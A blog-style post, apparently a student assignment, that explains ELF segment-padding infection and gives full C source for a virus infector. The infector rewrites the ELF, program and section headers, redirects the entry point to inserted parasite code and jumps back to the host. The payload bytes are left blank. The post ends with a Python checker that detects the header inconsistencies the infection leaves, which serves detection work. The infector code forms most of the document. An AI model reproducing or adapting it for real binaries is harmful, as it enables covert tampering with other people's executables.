A binary code injector (for infecting ELF files) (change)

2010-08-12  Source: original to this site  Category: OS  Views: 182

The injector mainly modifies some fields of the ELF header, the program header and the section header structures in order to insert the virus code. A sample of binary code stands in for the virus. The aim of the program is only to show how an ELF file gets infected: no real virus code was written, just the infection process itself. The test code executes before the infected program does.

We need to make the following changes to the ELF file:
1. In the ELF header, increase e_shoff by PAGESIZE.
2. Patch the tail of the parasitic code so that it can jump back to the original entry point of the host code.

Locate the text segment's program header, then:
3. In the ELF header, set e_entry to point to p_vaddr + p_filesz.
4. Modify p_filesz.
5. Modify p_memsz.

6. For each phdr after the text segment's phdr, increase p_offset by PAGESIZE.
7. For the last shdr in the text segment, increase sh_size by the size of the parasitic code.
8. For each shdr whose section offset is affected by the parasitic insertion, increase sh_offset by PAGESIZE.
9. Physically insert the parasitic code into the file, padded to make a complete page, at the text segment's original p_offset + p_filesz.

Code:

/*
ELF infector source file
Student:

Student ID:
Class:

*/

#include <stdio.h>
#include <stdlib.h>
#include <elf.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>  /* read, write, lseek */

// Define PAGESIZE, default 4K bytes
#define PAGESIZE 4096

// Parasite virus code. The code is copied from the Internet.
char Virus[] = {/*Binary code for test*/};

int infect(char *ElfFile);

// The size of the virus code
int VirusSize = sizeof(Virus);

int jmppoint = /*Jump point of binary code of Virus*/;

// Infector function
int infect(char *ElfFile)
{
    int result = 0;
    int Re;
    int FileD;
    int TmpD;
    int OldEntry;
    int OldShoff;
    int OldPhsize;
    int i = 0;

    Elf32_Ehdr elfh;
    Elf32_Phdr Phdr;
    Elf32_Shdr Shdr;

    // Open the ELF file and read the ELF header into elfh
    FileD = open(ElfFile, O_RDWR);
    read(FileD, &elfh, sizeof(elfh));
    if ((strncmp(elfh.e_ident, ELFMAG, SELFMAG)) != 0)
        exit(0);

    // Old entry point of the original ELF file
    OldEntry = elfh.e_entry;

    // Old section header offset of the ELF file
    OldShoff = elfh.e_shoff;

    // Modify the virus code line "movl "OldEntry",%eax" so that it jumps to
    // the old entry point after the virus code has executed
    *(int *)&Virus[jmppoint] = OldEntry;

    // Increase e_shoff by PAGESIZE in the ELF header
    elfh.e_shoff += PAGESIZE;

    // Give up if the virus code is too large
    if (VirusSize > (PAGESIZE - (elfh.e_entry % PAGESIZE)))
        exit(0);

    int Noff = 0;

    // Loop: read and modify the program headers
    for (i = 0; i < elfh.e_phnum; i++)
    {
        // Seek to the entry and read it into Phdr
        lseek(FileD, elfh.e_phoff + i * elfh.e_phentsize, SEEK_SET);
        read(FileD, &Phdr, sizeof(Phdr));
        if (Noff)
        {
            // For each phdr whose segment is after the insertion (text segment),
            // increase p_offset by PAGESIZE
            Phdr.p_offset += PAGESIZE;

            // Write back
            lseek(FileD, elfh.e_phoff + i * elfh.e_phentsize, SEEK_SET);
            write(FileD, &Phdr, sizeof(Phdr));
        }
        else if (PT_LOAD == Phdr.p_type && Phdr.p_offset == 0)
        {
            if (Phdr.p_filesz != Phdr.p_memsz)
                exit(0);

            // Locate the text segment program header.
            // Modify the entry point of the ELF header to point to the new
            // code (p_vaddr + p_filesz)
            elfh.e_entry = Phdr.p_vaddr + Phdr.p_filesz + 4;
            lseek(FileD, 0, SEEK_SET);

            // Write back the new ELF header
            write(FileD, &elfh, sizeof(elfh));
            OldPhsize = Phdr.p_filesz;
            Noff = Phdr.p_offset + Phdr.p_filesz;

            // Increase p_filesz to account for the new code (parasite)
            Phdr.p_filesz += VirusSize;

            // Increase p_memsz to account for the new code (parasite)
            Phdr.p_memsz += VirusSize;

            // Write back the program header
            lseek(FileD, elfh.e_phoff + i * elfh.e_phentsize, SEEK_SET);
            write(FileD, &Phdr, sizeof(Phdr));
        }
    }
    lseek(FileD, OldShoff, SEEK_SET);

    // Loop: read and modify the section headers
    for (i = 0; i < elfh.e_shnum; i++)
    {
        lseek(FileD, i * sizeof(Shdr) + OldShoff, SEEK_SET);
        Re = read(FileD, &Shdr, sizeof(Shdr));

        if (i == 1)
        {
            // For the last shdr in the text segment,
            // increase sh_size by the virus size
            Shdr.sh_size += VirusSize;
        }
        else if (i != 0)
        {
            // For each shdr whose section resides after the insertion,
            // increase sh_offset by PAGESIZE
            Shdr.sh_offset += PAGESIZE;
        }

        // Write back
        lseek(FileD, OldShoff + i * sizeof(Shdr), SEEK_SET);
        write(FileD, &Shdr, sizeof(Shdr));
    }

    // Get the file size, FileStat.st_size
    struct stat FileStat;
    fstat(FileD, &FileStat);

    char *Data = NULL;
    Data = (char *)malloc(FileStat.st_size - OldPhsize);

    lseek(FileD, OldPhsize, SEEK_SET);
    read(FileD, Data, FileStat.st_size - OldPhsize);

    // Insert the virus code into the ELF file
    lseek(FileD, OldPhsize, SEEK_SET);
    write(FileD, Virus, sizeof(Virus));
    char tmp[PAGESIZE] = {0};

    // Pad to PAGESIZE
    memset(tmp, 0, PAGESIZE - VirusSize);
    write(FileD, tmp, PAGESIZE - VirusSize);

    write(FileD, Data, FileStat.st_size - OldPhsize);
    result = 1;

    free(Data);

    return result;
}

// Just for test
int main(int argc, char **argv)
{
    // How to use it
    if (argc != 2)
    {
        printf("Usage : infect <ELF filename>\n");
        exit(0);
    }

    int test = infect(argv[1]);
    if (test != 1)
    {
        exit(0);
    }
    return 0;
}
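
The header changes listed above leave inconsistencies that can be checked statically, without running the file. The following Python check is an added example, not part of the original post: the function names, the indicator labels and the constructed header-only sample image are assumptions made for illustration, and only little-endian ELF32 is handled.

```python
import struct

PT_LOAD, SHF_ALLOC, SHF_EXECINSTR, PAGESIZE = 1, 0x2, 0x4, 4096

def parse_elf32(data):
    """Parse a little-endian ELF32 image into (e_entry, phdr tuples, shdr tuples)."""
    if data[:6] != b"\x7fELF\x01\x01":
        raise ValueError("not a little-endian ELF32 image")
    (entry, phoff, shoff, _, _, phentsize, phnum,
     shentsize, shnum, _) = struct.unpack_from("<4I6H", data, 24)
    phdrs = [struct.unpack_from("<8I", data, phoff + i * phentsize) for i in range(phnum)]
    shdrs = [struct.unpack_from("<10I", data, shoff + i * shentsize) for i in range(shnum)]
    return entry, phdrs, shdrs

def padding_indicators(data):
    """Name the header inconsistencies that the modifications listed above leave behind."""
    entry, phdrs, shdrs = parse_elf32(data)
    found = []
    # Text segment as the page's code picks it: the PT_LOAD entry with p_offset == 0.
    text = next((p for p in phdrs if p[0] == PT_LOAD and p[1] == 0), None)
    if text is None:
        return found
    p_offset, lo, hi = text[1], text[2], text[2] + text[4]
    code = [(s[3], s[3] + s[5]) for s in shdrs if s[2] & SHF_EXECINSTR]
    # Step 3: e_entry lands at the old end of the segment, past every code section.
    if code and lo <= entry < hi and not any(a <= entry < b for a, b in code):
        found.append("entry-outside-executable-sections")
    # The code's section loop adds PAGESIZE to sh_offset for every index above 1 but
    # leaves sh_addr alone, so sections inside the text segment stop lining up.
    for s in shdrs:
        if s[2] & SHF_ALLOC and lo <= s[3] < hi and s[4] != p_offset + s[3] - lo:
            found.append("section-offset-address-mismatch")
            break
    return found

def build_sample(entry, filesz, shift):
    """Constructed header-only image (not a real binary): NULL, data and code sections."""
    base = 0x08048000
    ehdr = b"\x7fELF\x01\x01\x01" + bytes(9) + struct.pack(
        "<2H5I6H", 2, 3, 1, entry, 52, 0x200, 0, 52, 32, 1, 40, 3, 0)
    phdr = struct.pack("<8I", PT_LOAD, 0, base, base, filesz, filesz, 5, PAGESIZE)
    rows = [(0, 0, 0, 0, 0), (1, SHF_ALLOC, base + 0x60, 0x60, 0x20),
            (1, SHF_ALLOC | SHF_EXECINSTR, base + 0x100, 0x100 + shift, 0x80)]
    shdrs = b"".join(struct.pack("<10I", 0, t, f, a, o, n, 0, 0, 1, 0) for t, f, a, o, n in rows)
    return (ehdr + phdr).ljust(0x200, b"\0") + shdrs

CLEAN = build_sample(0x08048100, 0x180, 0)
# Same image after the changes: entry at old p_filesz + 4, p_filesz grown, section shifted.
MODIFIED = build_sample(0x08048184, 0x1C0, PAGESIZE)
print(padding_indicators(CLEAN), padding_indicators(MODIFIED))
```

Both checks depend on the section header table, so a stripped binary with no section headers yields no findings from them.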